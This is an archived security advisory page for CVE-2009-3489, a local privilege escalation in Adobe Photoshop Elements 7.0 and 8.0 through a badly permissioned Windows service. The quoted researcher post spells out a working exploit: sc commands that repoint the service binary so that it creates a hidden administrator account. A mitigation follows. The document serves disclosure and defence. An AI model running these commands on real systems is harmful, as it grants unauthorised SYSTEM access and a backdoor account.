SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Adobe Photoshop Vendors:   Adobe Systems Incorporated
Adobe Photoshop Elements Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1022963
SecurityTracker URL:  http://securitytracker.com/id/1022963
CVE Reference:   CVE-2009-3489   (Links to External Site)
Updated:  Nov 11 2009
Original Entry Date:  Sep 30 2009
Impact:   Execution of arbitrary code via local system, Root access via local system
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Elements 7.0, 8.0
Description:   A vulnerability was reported in Adobe Photoshop Elements. A local user can obtain elevated privileges on the target system.

The Adobe Active File Monitor service is installed with an unsafe security descriptor. A local user in the 'Users' group can stop the service, invoke the 'sc config' command to replace the path with an arbitrary path, and then restart the service to execute arbitrary code with System privileges.

The original advisory is available at:

http://retrogod.altervista.org/9sg_adobe_pe_local.html

Nine:Situations:Group::bellick reported this vulnerability.

Impact:   A local user can obtain System privileges on the target system.
Solution:   No solution was available at the time of this entry.

The vendor has described a workaround in their advisory.

The vendor's advisory is available at:

http://www.adobe.com/support/security/bulletins/apsb09-17.html

Vendor URL:  www.adobe.com/support/security/bulletins/apsb09-17.html (Links to External Site)
Cause:   Configuration error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Adobe Photoshop Elements 8.0 Active File Monitor Service Bad

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Tested on Microsoft Windows XP SP3

The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of choice, then restart
the service to run the command with SYSTEM privileges ex., run theese commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password "kills"

mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

note the WO and WD permission for Everyone (!!!!!)

change the security descriptor like the following:

c:\sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

readings, interesting article:
http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx

original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC